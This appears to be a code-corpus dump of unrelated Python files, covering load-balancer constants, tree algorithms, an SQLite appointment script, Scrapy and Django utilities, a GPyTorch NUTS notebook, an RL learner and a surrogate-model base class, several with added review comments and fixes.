content stringlengths 5 1.05M |
|---|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Mirantis, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Load-balancer scheduling algorithms.
LB_METHOD_ROUND_ROBIN = 'ROUND_ROBIN'
LB_METHOD_LEAST_CONNECTIONS = 'LEAST_CONNECTIONS'
LB_METHOD_SOURCE_IP = 'SOURCE_IP'

# Protocols a VIP / listener can serve.
PROTOCOL_TCP = 'TCP'
PROTOCOL_HTTP = 'HTTP'
PROTOCOL_HTTPS = 'HTTPS'

# Health-monitor probe types.
HEALTH_MONITOR_PING = 'PING'
HEALTH_MONITOR_TCP = 'TCP'
HEALTH_MONITOR_HTTP = 'HTTP'
HEALTH_MONITOR_HTTPS = 'HTTPS'

# Session-persistence (stickiness) modes.
SESSION_PERSISTENCE_SOURCE_IP = 'SOURCE_IP'
SESSION_PERSISTENCE_HTTP_COOKIE = 'HTTP_COOKIE'
SESSION_PERSISTENCE_APP_COOKIE = 'APP_COOKIE'

# Keys used when reporting load-balancer statistics.
STATS_CURRENT_CONNECTIONS = 'CURRENT_CONNECTIONS'
STATS_MAX_CONNECTIONS = 'MAX_CONNECTIONS'
STATS_CURRENT_SESSIONS = 'CURRENT_SESSIONS'
STATS_MAX_SESSIONS = 'MAX_SESSIONS'
STATS_TOTAL_SESSIONS = 'TOTAL_SESSIONS'
STATS_IN_BYTES = 'IN_BYTES'
STATS_OUT_BYTES = 'OUT_BYTES'
STATS_CONNECTION_ERRORS = 'CONNECTION_ERRORS'
STATS_RESPONSE_ERRORS = 'RESPONSE_ERRORS'
|
#!/usr/bin/env python
# encoding: utf-8
'''
@author: Jason Lee
@license: (C) Copyright @ Jason Lee
@contact: jiansenll@163.com
@file: jianzhi_offer_39.py
@time: 2019/5/13 14:40
@desc:
'''
class TreeNode:
    """Binary-tree node: a value plus optional left/right children."""

    def __init__(self, x):
        # Children start empty and are attached by the caller.
        self.val = x
        self.left = None
        self.right = None
class Solution:
    """Jianzhi Offer 39: depth of a binary tree."""

    def TreeDepth(self, pRoot):
        """Return the number of nodes on the longest root-to-leaf path
        (0 for an empty tree)."""
        if not pRoot:
            return 0
        left_depth = self.TreeDepth(pRoot.left)
        right_depth = self.TreeDepth(pRoot.right)
        # Depth is one more than the deeper subtree.
        return 1 + max(left_depth, right_depth)
|
"""Populating the simple appointments database with the data supplied
by the user. Multiple appointment entries are possible.
"""
import sqlite3
from contextlib import closing
import datetime
from collections import namedtuple
# SQLite database file, created next to the script on first run.
DATABASE = 'week43.db'

# One validated appointment as collected from the user.
User_entry = namedtuple('User_entry', [
    'title', # title is compulsory
    'comment', # comment can be empty
    'start', # string representation of datetime object
    'hours', # integer, hours of appointment duration
    'minutes' # integer, minutes in addition to hours duration
])
def get_user_input():
    """Returns validated user input for inclusion into a database.

    Prompts for a title (must be non-empty), a start date/time (validated by
    constructing a datetime), a positive duration, and an optional comment.
    """
    print('--- New appointment entry ---')
    # Title: re-prompt until non-empty.
    title = input("Appointment's title? ")
    while len(title) == 0:
        print('Title can not be empty')
        title = input("Appointment's title? ")
    # Date/time: a successful datetime() construction proves the values
    # entered by the user are a real calendar date and clock time.
    start = None
    while start is None:
        print('Date and time of the appointment:')
        day = input('\tDay? ')
        month = input('\tMonth (number)? ')
        year = input('\tYear? ')
        hour = input('\tHour (24h clock)? ')
        minute = input('\tMinute? ')
        try:
            start = datetime.datetime(int(year), int(month), int(day),
                                      int(hour), int(minute))
        except ValueError:
            print('Please correct date and time')
    # Duration: non-negative hours/minutes, total strictly positive.
    while True:
        print('Duration of the appointment:')
        try:
            hour = int(input('\tHours? '))
            minute = int(input('\tMinutes? '))
        except ValueError:
            print('Please correct duration time')
            continue
        if hour >= 0 and minute >= 0 and hour + minute > 0:
            break
        print('Please correct duration time')
    comment = input('Any comments? ')
    return User_entry(title, comment, str(start), hour, minute)
# Context manager assures that the database connection is closed automatically.
with closing(sqlite3.connect(DATABASE)) as con:
    # Successful transactions are committed automatically by `with con`.
    with con:
        cur = con.cursor()
        # appointments start and end timestamps are stored as UTC julian dates,
        # therefore independent of time zones and daylight savings
        cur.execute('''CREATE TABLE IF NOT EXISTS appointments (
        title TEXT NOT NULL,
        comment TEXT,
        start REAL,
        end REAL)''')
        # Collect entries until the user declines to add another.
        while True:
            entry = get_user_input()
            # the end timestamp is calculated during insertion using SQLite
            # date and time function
            cur.execute('''INSERT INTO appointments VALUES (
            ?, ?, julianday(?, 'utc'), julianday(?, ?, ?, 'utc'))''',
            (entry.title, entry.comment, entry.start, entry.start,
            f'+{entry.hours} hour', f'+{entry.minutes} minute'))
            if input('Press Y to make next appointment: ').lower() != 'y':
                break
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .get_alerts_by_host_id.action import GetAlertsByHostId
from .get_host_id_from_hostname.action import GetHostIdFromHostname
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import csv
from admincode import settings
def write_to_csv(item):
    """Append one scraped admin-code row to the CSV file from settings.

    Fixes a resource leak: the original passed a bare ``open(...)`` into
    ``csv.writer`` and never closed the handle, relying on GC to flush it.

    Parameters:
        item: mapping with the keys listed in ``fieldnames`` below.
    """
    fieldnames = ['year', 'prov_name',
                  'city_name', 'city_code',
                  'county_name', 'county_code',
                  'town_name', 'town_code']
    # 'with' guarantees the file is flushed and closed even if writerow fails.
    with open(settings.CSV_FILE_PATH, 'a') as f:
        writer = csv.writer(f, lineterminator='\n')
        writer.writerow([item[key] for key in fieldnames])
class CsvExportPipeline(object):
    """Scrapy pipeline that appends every scraped item to the CSV file."""

    def process_item(self, item, spider):
        """Persist the item to CSV and pass it along unchanged."""
        write_to_csv(item)
        return item
class AdmincodePipeline(object):
    """Default no-op pipeline: items pass through untouched."""

    def process_item(self, item, spider):
        """Return the item unchanged."""
        return item
|
import requests
import http.cookiejar, urllib.request
from bs4 import BeautifulSoup
class Google:
    """Requests session that logs in to a Google account and keeps its cookies.

    NOTE(review): this drives Google's legacy ServiceLogin form endpoints,
    which Google has since locked down — verify the login still works before
    relying on it.
    """

    def __init__(self, login, pwd):
        """Scrape the login form's hidden fields, add credentials, and POST
        them to establish an authenticated session.

        Parameters:
            login: account e-mail address.
            pwd: account password.
        """
        url_login = "https://accounts.google.com/ServiceLogin"
        url_auth = "https://accounts.google.com/ServiceLoginAuth"
        self.cookie = http.cookiejar.MozillaCookieJar()
        self.ses = requests.session()
        self.ses.cookies = self.cookie
        login_html = self.ses.get(url_login)
        # Carry over the form's pre-filled hidden inputs (CSRF-style tokens)
        # so the auth POST looks like a normal browser submission.
        soup_login = BeautifulSoup(login_html.content, "lxml").find('form').find_all('input')
        my_dict = {}
        for u in soup_login:
            if u.has_attr('value'):
                my_dict[u['name']] = u['value']
        my_dict['Email'] = login
        my_dict['Passwd'] = pwd
        self.ses.post(url_auth, data = my_dict)

    def get(self, URL, header = None):
        """GET through the authenticated session.

        Bug fix: the original used a mutable default ``header = {}``, a
        shared-state hazard. ``None`` is accepted by requests and means
        "no extra headers", so the call is backward compatible.
        """
        return self.ses.get(URL, headers = header)

    def post(self, URL, payload, header = None):
        """POST ``payload`` through the authenticated session (same mutable
        default fix as ``get``)."""
        return self.ses.post(URL, data = payload, headers = header)
# NOTE(review): module-level side effect — importing this file performs a live
# login attempt with empty credentials. Fill in real values or guard this call.
Google ('', '') # your email and password
|
import numpy as np
from qore import Mine, ASP, QAOA, VQE
from qore.utils import measure_operator, get_bitstring_probabilities, identity
from qiskit.utils import algorithm_globals, QuantumInstance, quantum_instance
from qiskit.algorithms.optimizers import COBYLA
from qiskit.providers.aer import QasmSimulator, StatevectorSimulator
from qiskit.opflow import I, Z, Plus
from qore.benchmark import Benchmark
# Callback invoked periodically during the quantum solve to inspect progress.
def analysis(circ, iter):
    """Print the most probable bitstring of `circ` and plot the mine state.

    NOTE(review): `iter` shadows the builtin of the same name; renaming it
    could break keyword-argument callers, so it is left as-is.
    Uses the module-level `qmine` defined in the main block below.
    """
    print(f"--- Iter {iter} ---")
    x = get_bitstring_probabilities(circ)
    # Pick the configuration with the highest measured probability.
    bitstr, prob = max(x.items(), key=lambda item: item[1])
    print(f"The most probable configuration and the corresponding probability: {bitstr, prob}")
    qmine.plot_mine_state(bitstr)
if __name__ == "__main__":
    # NOTE(review): `penalty` is never used in this script.
    penalty = 10.0
    # NOTE(review): this first 2x3 mine is immediately overwritten by the
    # larger 3x5 problem below — it looks like leftover experimentation.
    qmine = Mine(np.array([[-2.0, 3.0, 1.0], [float("inf"), 5.0, float("inf")]]))
    # Mine values: negative = cost to dig, positive = profit, inf = undiggable.
    qmine = Mine(
        np.array(
            [
                [-2.0, 3.0, -1.0, -2.0, -1.0],
                [float("inf"), 1.0, -5.0, 10.0, float("inf")],
                [float("inf"), float("inf"), 4.0, float("inf"), float("inf")],
            ]
        )
    )
    qmine.plot_mine()
    # algorithm_globals.random_seed = 1953
    algorithm_globals.massive = True
    # Adiabatic state preparation: total evolution time split into nsteps.
    evol_time = 10
    nsteps = 20
    asp = ASP(
        evol_time,
        nsteps,
        # callback=analysis,
        # callback_freq=5,
        quantum_instance=QasmSimulator(),
    )
    res = qmine.solve(asp, False, False)
    print(res)
|
import xml.etree.ElementTree as ET
from django.db import transaction
from django.core.management.base import BaseCommand, CommandError
import raster.models as models
IGNORE_LABEL = ['no data']
class Command(BaseCommand):
    # Django management command: import a raster legend from a QGIS .qml file.
    help = 'Load a legend from a qml file'

    def add_arguments(self, parser):
        # Positional args: name to store the legend under, and the source file.
        parser.add_argument('legend_name', type=str)
        parser.add_argument('legend_file', type=str)

    def handle(self, *args, **options):
        """Entry point: delegate to parse_and_import and report success."""
        legend_name = options['legend_name']
        legend_file = options['legend_file']
        self.parse_and_import(legend_name, legend_file)
        self.stdout.write('Successfully imported legend "%s"' % legend_name)

    def parse_and_import(self, legend_name, legend_file):
        """Parse the QML XML and create Legend/LegendSemantics/LegendEntry rows."""
        tree = ET.parse(legend_file)
        root = tree.getroot()
        # Palette entries carry the raster value, display color and label.
        colors = root.findall('./pipe/rasterrenderer/colorPalette/paletteEntry')
        # All-or-nothing: any failure rolls the whole import back.
        with transaction.atomic():
            # The expected (success) path is that the lookup raises
            # DoesNotExist; finding an existing legend aborts the command.
            # The CommandError raised inside the try is NOT caught by the
            # DoesNotExist handler and propagates to the caller.
            try:
                legend = models.Legend.objects.get(title=legend_name)
                raise CommandError('legend already exists')
            except models.Legend.DoesNotExist:
                pass
            legend = models.Legend(title=legend_name)
            legend.save()
            for pe in colors:
                pe_value = pe.attrib['value']
                pe_color = pe.attrib['color']
                pe_label = pe.attrib['label']
                # Skip placeholder entries such as 'no data'.
                if pe_label.lower() in IGNORE_LABEL:
                    continue
                # Each palette value maps to an exact-match expression.
                pe_expression = 'x == {0}'.format(pe_value)
                semantic = models.LegendSemantics(name=pe_label)
                semantic.save()
                legend_entry = models.LegendEntry(semantics=semantic,
                                                  expression=pe_expression,
                                                  color=pe_color)
                legend_entry.save()
                legend.entries.add(legend_entry)
            legend.save()
|
# Author: Parag Mali
# This file performs postprocessing on the detection results
# so that it perfectly contains the connected components
import numpy as np
import cv2
def convert_to_binary(image):
    """Binarize a BGR image: dark pixels (grey <= 127) become 1, light 0.

    Foreground (ink) is assumed dark, hence the inverted threshold.
    """
    gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # Boolean mask cast to float64 — same dtype/values as the original
    # np.zeros-and-assign approach.
    return (gray_image <= 127).astype(np.float64)
def adjust_box_p(args):
    """Pool-friendly wrapper: unpack an (im_bw, box) tuple for adjust_box."""
    return adjust_box(*args)
def adjust_box(im_bw, box):
    """Snap a detection box onto the connected components it covers.

    The box is first shrunk to the tight bounding box of the foreground
    pixels inside it, then grown to include any components crossing its edge.
    """
    rounded = [int(np.round(coord)) for coord in box]
    return expand(im_bw, contract(im_bw, rounded))
def contract(im_bw, box):
    """Shrink `box` ([x0, y0, x1, y1]) to the tight bounding box of the
    foreground pixels (value 1) it contains.

    Returns [0, 0, 0, 0] when the region holds no foreground pixels.
    Mutates and returns `box` in the non-empty case, like the original.
    """
    region = im_bw[box[1]:box[3], box[0]:box[2]]
    rows_with_pixels = np.any(region, axis=1)
    cols_with_pixels = np.any(region, axis=0)
    # Bug fix: the original tested `len(rows_with_pixels==True) == 0`, which
    # measures the ARRAY LENGTH (never zero for a non-degenerate box), not
    # whether any pixel is set — so empty regions fell through to argmax and
    # produced a bogus box instead of [0, 0, 0, 0].
    if not rows_with_pixels.any() or not cols_with_pixels.any():
        return [0, 0, 0, 0]
    # argmax on a boolean array returns the first True index.
    left = box[0] + np.argmax(cols_with_pixels)
    top = box[1] + np.argmax(rows_with_pixels)
    # Reverse + argmax finds the last True index.
    right = box[0] + len(cols_with_pixels) - np.argmax(cols_with_pixels[::-1]) - 1
    bottom = box[1] + len(rows_with_pixels) - np.argmax(rows_with_pixels[::-1]) - 1
    box[0] = left
    box[1] = top
    box[2] = right
    box[3] = bottom
    return box
def expand(im_bw, box):
    """Grow `box` until it covers every connected component it touches.

    The boxed region is painted solid on a scratch copy of the image, then a
    BFS flood fill from the box's top-left corner walks every reachable
    foreground pixel and stretches the box around it. Mutates and returns box.
    """
    scratch = np.copy(im_bw)
    scratch[box[1]:box[3], box[0]:box[2]] = 1
    frontier = [(box[1], box[0])]  # (row, col) seed
    seen = set()
    while frontier:
        cell = frontier.pop(0)
        if cell in seen:
            continue
        frontier.extend(get_adjacent_spaces(scratch, cell, seen))
        row, col = cell
        box[0] = min(col, box[0])  # left
        box[1] = min(row, box[1])  # top
        box[2] = max(col, box[2])  # left + width
        box[3] = max(row, box[3])  # top + height
        seen.add(cell)
    return box
def get_adjacent_spaces(im_bw, space, visited):
    """Return unvisited 4-neighbours of `space` whose pixel value is 1.

    Neighbours are produced in the fixed order down, up, right, left;
    out-of-bounds coordinates are skipped.
    """
    n_rows, n_cols = im_bw.shape[0], im_bw.shape[1]
    in_bounds = []
    for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
        nr, nc = space[0] + dr, space[1] + dc
        if 0 <= nr < n_rows and 0 <= nc < n_cols:
            in_bounds.append((nr, nc))
    return [cell for cell in in_bounds
            if im_bw[cell[0]][cell[1]] == 1 and cell not in visited]
|
from solns.graph.graph import *
class Solution:
    """Graph traversal solutions."""

    @staticmethod
    def naive(G, s, visited, seq):
        """Preorder DFS from `s` over adjacency mapping `G`, appending each
        newly discovered vertex (stringified) to `seq`; returns the result."""
        if s in visited:
            return seq
        visited.add(s)
        seq += str(s)
        for neighbour in G[s]:
            if neighbour not in visited:
                seq = Solution.naive(G, neighbour, visited, seq)
        return seq
'''
Implement the BSTIterator class that represents an iterator over the in-order traversal of a binary search tree (BST):
BSTIterator(TreeNode root) Initializes an object of the BSTIterator class. The root of the BST is given as part of the constructor. The pointer should be initialized to a non-existent number smaller than any element in the BST.
boolean hasNext() Returns true if there exists a number in the traversal to the right of the pointer, otherwise returns false.
int next() Moves the pointer to the right, then returns the number at the pointer.
Notice that by initializing the pointer to a non-existent smallest number, the first call to next() will return the smallest element in the BST.
You may assume that next() calls will always be valid. That is, there will be at least a next number in the in-order traversal when next() is called.
'''
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class BSTIterator(object):
    # In-order BST iterator using a lazily-unrolled stack. The stack mixes
    # real nodes with None sentinels: a None on top means the node directly
    # beneath it has had its left subtree fully expanded and is ready to be
    # emitted.
    def __init__(self, root):
        """
        :type root: TreeNode
        """
        # Seed with the (unexpanded) root.
        self.stack = [root]
        # Pending-entry count used by hasNext(); starts at 1 even for an
        # empty tree — the problem guarantees next() calls are valid.
        self.size = 1
    def next(self):
        """
        :rtype: int
        """
        while self.stack:
            node = self.stack.pop()
            if not node:
                # Sentinel found: the node below it is the next in-order value.
                node = self.stack.pop()
                self.size = len(self.stack)
                return node.val
            # Expand: push right subtree (visited last), then the node with a
            # sentinel marking it as "ready", then the left subtree (visited
            # first).
            if node.right:
                self.stack.append(node.right)
            self.stack.append(node)
            self.stack.append(None)
            if node.left:
                self.stack.append(node.left)
        return None
    def hasNext(self):
        """
        :rtype: bool
        """
        # size is refreshed on every successful next(); zero means exhausted.
        return self.size > 0
# Your BSTIterator object will be instantiated and called as such:
# obj = BSTIterator(root)
# param_1 = obj.next()
# param_2 = obj.hasNext() |
#!/usr/bin/env python
# coding: utf-8
# # Fully Bayesian GPs - Sampling Hyperparamters with NUTS
#
# In this notebook, we'll demonstrate how to integrate GPyTorch and NUTS to sample GP hyperparameters and perform GP inference in a fully Bayesian way.
#
# The high level overview of sampling in GPyTorch is as follows:
#
# 1. Define your model as normal, extending ExactGP and defining a forward method.
# 2. For each parameter your model defines, you'll need to register a GPyTorch prior with that parameter, or some function of the parameter. If you use something other than a default closure (e.g., by specifying a parameter or transformed parameter name), you'll need to also specify a setting_closure: see the docs for `gpytorch.Module.register_prior`.
# 3. Define a pyro model that has a sample site for each GP parameter. For your convenience, we define a `pyro_sample_from_prior` method on `gpytorch.Module` that returns a copy of the module where each parameter has been replaced by the result of a `pyro.sample` call.
# 4. Run NUTS (or HMC etc) on the pyro model you just defined to generate samples. Note this can take quite a while or no time at all depending on the priors you've defined.
# 5. Load the samples in to the model, converting the model from a simple GP to a batch GP (see our example notebook on simple batch GPs), where each GP in the batch corresponds to a different hyperparameter sample.
# 6. Pass test data through the batch GP to get predictions for each hyperparameter sample.
# In[1]:
import math
import torch
# Bug fix: the original line read "import Lgpytorch", which is not a real
# package (the notebook is about GPyTorch, and a later cell imports
# gpytorch.priors directly). Import the real package and keep the old
# "Lgpytorch" name bound as an alias so the remaining cells, which still
# reference Lgpytorch, continue to work unchanged.
import gpytorch
Lgpytorch = gpytorch
import pyro
from pyro.infer.mcmc import NUTS, MCMC, HMC
from matplotlib import pyplot as plt
import arviz as az
# In[29]:
# Training data is 5 points in [0,1] inclusive regularly spaced
# (the original comment claimed 11 points, but linspace(0, 1, 5) yields 5).
train_x = torch.linspace(0, 1, 5)
# True function is sin(2*pi*x) with Gaussian noise
train_y = torch.sin(train_x * (2 * math.pi)) + torch.randn(train_x.size()) * 0.2
# In[41]:
# We will use the simplest form of GP model, exact inference
class ExactGPModel(Lgpytorch.models.ExactGP):
    """Exact GP with a constant mean and a scaled RBF kernel.

    NOTE(review): 'Lgpytorch' appears to be a garbled reference to the
    `gpytorch` package (the notebook text and the `gpytorch.priors` import
    in a later cell use the real name) — confirm the top-of-file import.
    """
    def __init__(self, train_x, train_y, likelihood):
        super(ExactGPModel, self).__init__(train_x, train_y, likelihood)
        self.mean_module = Lgpytorch.means.ConstantMean()
        self.covar_module = Lgpytorch.kernels.ScaleKernel(Lgpytorch.kernels.RBFKernel())
    def forward(self, x):
        # Return the GP prior at x as a multivariate normal distribution.
        mean_x = self.mean_module(x)
        covar_x = self.covar_module(x)
        return Lgpytorch.distributions.MultivariateNormal(mean_x, covar_x)
# ## Running Sampling
#
# The next cell is the first piece of code that differs substantially from other work flows. In it, we create the model and likelihood as normal, and then register priors to each of the parameters of the model. Note that we directly can register priors to transformed parameters (e.g., "lengthscale") rather than raw ones (e.g., "raw_lengthscale"). This is useful, **however** you'll need to specify a prior whose support is fully contained in the domain of the parameter. For example, a lengthscale prior must have support only over the positive reals or a subset thereof.
# In[59]:
# this is for running the notebook in our testing framework
import os
smoke_test = ('CI' in os.environ)
num_samples = 2 if smoke_test else 100
warmup_steps = 2 if smoke_test else 100
from gpytorch.priors import LogNormalPrior, NormalPrior, UniformPrior
# Use a positive constraint instead of usual GreaterThan(1e-4) so that LogNormal has support over full range.
# NOTE(review): 'Lgpytorch' below is presumably the gpytorch package under a
# corrupted name — verify against the top-of-file import.
likelihood = Lgpytorch.likelihoods.GaussianLikelihood(noise_constraint=Lgpytorch.constraints.Positive())
model = ExactGPModel(train_x, train_y, likelihood)
# Register a prior on each (transformed) hyperparameter NUTS should sample.
model.mean_module.register_prior("mean_prior", UniformPrior(-1, 1), "constant")
model.covar_module.base_kernel.register_prior("lengthscale_prior", UniformPrior(0.01, 0.5), "lengthscale")
model.covar_module.register_prior("outputscale_prior", UniformPrior(1, 2), "outputscale")
likelihood.register_prior("noise_prior", UniformPrior(0.01, 0.5), "noise")
mll = Lgpytorch.mlls.ExactMarginalLogLikelihood(likelihood, model)
def pyro_model(x, y):
    """Pyro model: draw GP hyperparameters from their registered priors,
    then condition on the observed targets y.

    Uses the module-level `model`; `pyro_sample_from_prior` returns a copy
    of it whose parameters are `pyro.sample` draws.
    """
    # Disable fast (approximate) computations so NUTS sees exact likelihoods.
    with Lgpytorch.settings.fast_computations(False, False, False):
        sampled_model = model.pyro_sample_from_prior()
        output = sampled_model.likelihood(sampled_model(x))
        pyro.sample("obs", output, obs=y)
    return y
num_chains = 1
# Bug fix: the original unconditionally reset warmup_steps and num_samples to
# 100 here, clobbering the 2-sample smoke-test values selected in the cell
# above and making CI runs as expensive as real ones. The values chosen there
# (2 under CI, 100 otherwise) are kept instead.
if __name__ == '__main__':
    nuts_kernel = NUTS(pyro_model)
    mcmc_run = MCMC(nuts_kernel, num_samples=num_samples, warmup_steps=warmup_steps,
                    disable_progbar=smoke_test, num_chains=num_chains)
    mcmc_run.run(train_x, train_y)
# ## Loading Samples
#
# In the next cell, we load the samples generated by NUTS in to the model. This converts `model` from a single GP to a batch of `num_samples` GPs, in this case 100.
# NOTE(review): everything below runs at import time, outside the
# `if __name__` guard above — it will fail if this module is imported
# rather than executed; confirm the intended guard placement.
#mcmc_run.diagnostics()
mcmc_run.summary(prob = 0.95)
# Posterior diagnostics: pairwise scatter and trace plots via ArviZ.
az.plot_pair(az.from_pyro(mcmc_run))
plt.show()
az.plot_trace(az.from_pyro(mcmc_run))
plt.show()
# In[60]:
model.pyro_load_from_samples(mcmc_run.get_samples())
# In[61]:
model.eval()
test_x = torch.linspace(0, 1, 101).unsqueeze(-1)
test_y = torch.sin(test_x * (2 * math.pi))
# One batch entry per posterior hyperparameter sample.
expanded_test_x = test_x.unsqueeze(0).repeat(num_samples * num_chains, 1, 1)
output = model(expanded_test_x)
# ## Plot Mean Functions
#
# In the next cell, we plot the first 25 mean functions on the same plot. This particular example has a fairly large amount of data for only 1 dimension, so the hyperparameter posterior is quite tight and there is relatively little variance.
# In[62]:
with torch.no_grad():
    # Initialize plot
    f, ax = plt.subplots(1, 1, figsize=(4, 3))
    # Plot training data as black stars
    ax.plot(train_x.numpy(), train_y.numpy(), 'k*', zorder=10)
    for i in range(min(num_samples, 25)):
        # Plot predictive means as blue line
        ax.plot(test_x.numpy(), output.mean[i].detach().numpy(), 'b', linewidth=0.3)
    # Shade between the lower and upper confidence bounds
    # ax.fill_between(test_x.numpy(), lower.numpy(), upper.numpy(), alpha=0.5)
    ax.set_ylim([-3, 3])
    ax.legend(['Observed Data', 'Sampled Means'])
plt.show()
# ## Simulate Loading Model from Disk
#
# Loading a fully Bayesian model from disk is slightly different from loading a standard model because the process of sampling changes the shapes of the model's parameters. To account for this, you'll need to call `load_strict_shapes(False)` on the model before loading the state dict. In the cell below, we demonstrate this by recreating the model and loading from the state dict.
#
# Note that without the `load_strict_shapes` call, this would fail.
# In[63]:
state_dict = model.state_dict()
model = ExactGPModel(train_x, train_y, likelihood)
# Load parameters without standard shape checking.
model.load_strict_shapes(False)
model.load_state_dict(state_dict)
# In[ ]:
|
# Copyright (c) 2019, salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: MIT
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/MIT
from .base import BaseLearner
import numpy as np
class BaseGridOracleLearner(BaseLearner):
    """Learner that adds a "grid oracle" exploration bonus: the terminal step
    of each episode earns `rew_per_grid` for every distinct grid cell (of
    side `grid_size`) the agent visited during the episode.
    """
    AGENT_TYPE = 'GridOracle'
    def __init__(self,
                 *args,
                 grid_size=2,
                 rew_per_grid=0.01,
                 **kwargs):
        super().__init__(*args, **kwargs)
        # Per-step distance to goal, reset every episode.
        self.distance = []
        # Distinct discretized (x, y) cells seen this episode.
        self.locs_visited = set()
        self.grid_size = grid_size
        assert self.grid_size > 0
        self.rew_per_grid = float(rew_per_grid)
        assert self.rew_per_grid >= 0
    @property
    def was_success(self):
        # Whether the wrapped environment reports goal completion.
        return bool(self.agent.env.is_success)
    @property
    def n_steps(self):
        # Episode length in transitions.
        return int(len(self.agent.episode))
    @property
    def dist_to_goal(self):
        # Distance recorded for the final step of the episode.
        return float(self.distance[-1])
    @property
    def unique_visitations(self):
        # Number of distinct grid cells visited this episode.
        return float(len(self.locs_visited))
    def _reset_ep_stats(self):
        super()._reset_ep_stats()
        self.distance = []
        self.locs_visited = set()
    def _count_visitation(self, coords):
        # Shift by half a unit, then bucket coordinates into grid_size-wide
        # cells. NOTE(review): assumes `coords` is a 2-element array-like
        # whose elements support .item() (numpy/torch) — confirm callers.
        x, y = coords + 0.5
        discritized_x = int(np.floor(x.item() / self.grid_size))
        discritized_y = int(np.floor(y.item() / self.grid_size))
        self.locs_visited.add((discritized_x, discritized_y))
    def relabel_episode(self):
        """Rewrite episode rewards in place: base reward becomes the
        'complete' signal, and the terminal step gains the grid-oracle
        visitation bonus."""
        self._compress_me = []
        for e in self.agent.episode:
            # Zero the env reward, then substitute the completion signal.
            e['reward'] *= 0
            e['reward'] += e['complete']
            self.distance.append(self._dummy_env.dist(e['next_state'], e['goal']).item())
            # Manage set of visited locs
            self._count_visitation(coords=e['next_state'][:2])
        # Add grid oracle reward to terminal action
        self.agent.episode[-1]['reward'] += self.rew_per_grid * self.unique_visitations
        self._compress_me.append(self.agent.episode)
        self._add_im_reward()
    def fill_summary(self, *values):
        # Summary layout: [success, final distance, unique cells, *extras].
        manual_summary = [float(self.was_success), float(self.dist_to_goal), float(self.unique_visitations)]
        for v in values:
            manual_summary.append(v.item())
        self._ep_summary = manual_summary
|
#!/usr/bin/env python3
# Manual smoke-test script: bump the API-request counter for a user.
import requests
import json
# NOTE(review): hard-coded API token checked into source — rotate it and load
# it from an environment variable or config file instead.
client_token = 'Aea84abc487da11e9afa48308d39e8e0aBAZHello'
url = 'http://localhost:4000/api/user_api_request_inc' # Use for local testing
# Increment the counter for user 1 / API 1.
payload = {'client_token': client_token, 'user_id': 1, 'api_id': 1}
headers = {'content-type': 'application/json'}
# POST the JSON body and echo status + response for manual inspection.
r = requests.post(url, data=json.dumps(payload), headers=headers)
print(r.status_code)
print(r.text)
|
"""
Abstract base class for all surrogate models.
Class structure:
- Surrogate
- GaussianProcess
- GPSurrogate (Custom)
- GPySurrogate (GPy)
- SklearnGPSurrogate (Sklearn)
- ANN
- ANNSurrogate (Pytorch)
- Autoencoder (Pytorch)
- LinearRegression
- Linear regression surrogates (Work in progress)
"""
from abc import abstractmethod
import numpy as np
from profit.util.base_class import CustomABC
from profit.defaults import fit as defaults
class Surrogate(CustomABC):
    """Base class for all surrogate models.
    Attributes:
        trained (bool): Flag that indicates if the model is already trained and ready to make predictions.
        fixed_sigma_n (bool): Indicates if the data noise should be optimized or not.
        Xtrain (ndarray): Input training points.
        ytrain (ndarray): Observed output data.
            Vector output is supported for independent variables only.
        ndim (int): Dimension of input data.
        output_ndim (int): Dimension of output data.
        encoder (list of profit.sur.encoders.Encoder): For now, inputs of kind 'LogUniform' are encoded with 'log10'
            and all input and output data is normalized. Can be modified in the config file using the format
            e.g. [['log10', [0], False], ['normalization', [0, 1], False]].
    Default parameters:
        surrogate: GPy
        save: ./model_{surrogate_label}.hdf5
        load: False
        fixed_sigma_n: False
        encoder: [['log10', [log_input_cols], False], ['normalization', [input_cols], False],
            ['normalization', [output_cols], True]]
    """
    labels = {} # All surrogates are registered here

    def __init__(self):
        self.trained = False
        self.fixed_sigma_n = False
        self.Xtrain = None
        self.ytrain = None
        self.ndim = None # TODO: Consistency between len(base_config['input']) and self.Xtrain.shape[-1]
        self.output_ndim = 1
        self.encoder = []

    def encode_training_data(self):
        """Encodes the input and output training data.
        """
        # Encoders are applied in registration order.
        for enc in self.encoder:
            if enc.work_on_output:
                self.ytrain = enc.encode(self.ytrain)
            else:
                self.Xtrain = enc.encode(self.Xtrain)

    def decode_training_data(self):
        """Applies the decoding function of the encoder in reverse order on the input and output training data.
        """
        # Reverse order undoes the encoding chain exactly.
        for enc in self.encoder[::-1]:
            if enc.work_on_output:
                self.ytrain = enc.decode(self.ytrain)
            else:
                self.Xtrain = enc.decode(self.Xtrain)

    def encode_predict_data(self, x):
        """Transforms the input prediction points according to the encoder used for training.
        Parameters:
            x (ndarray): Prediction input points.
        Returns:
            ndarray: Encoded and normalized prediction points.
        """
        for enc in self.encoder:
            if not enc.work_on_output:
                x = enc.encode(x)
        return x

    def decode_predict_data(self, ym, yv):
        """Rescales and then back-transforms the predicted output.
        Parameters:
            ym (ndarray): Predictive output.
            yv (ndarray): Variance of predicted output.
        Returns:
            tuple: a tuple containing:
                - ym (ndarray) Rescaled and decoded output values at the test input points.
                - yv (ndarray): Rescaled predictive variance.
        """
        for enc in self.encoder[::-1]:
            if enc.work_on_output:
                if enc.label == 'Normalization':
                    # Variance scales with the square of the normalization factor.
                    # TODO: Move this somewhere inside the Encoder with a flag like 'work_on_variance'?
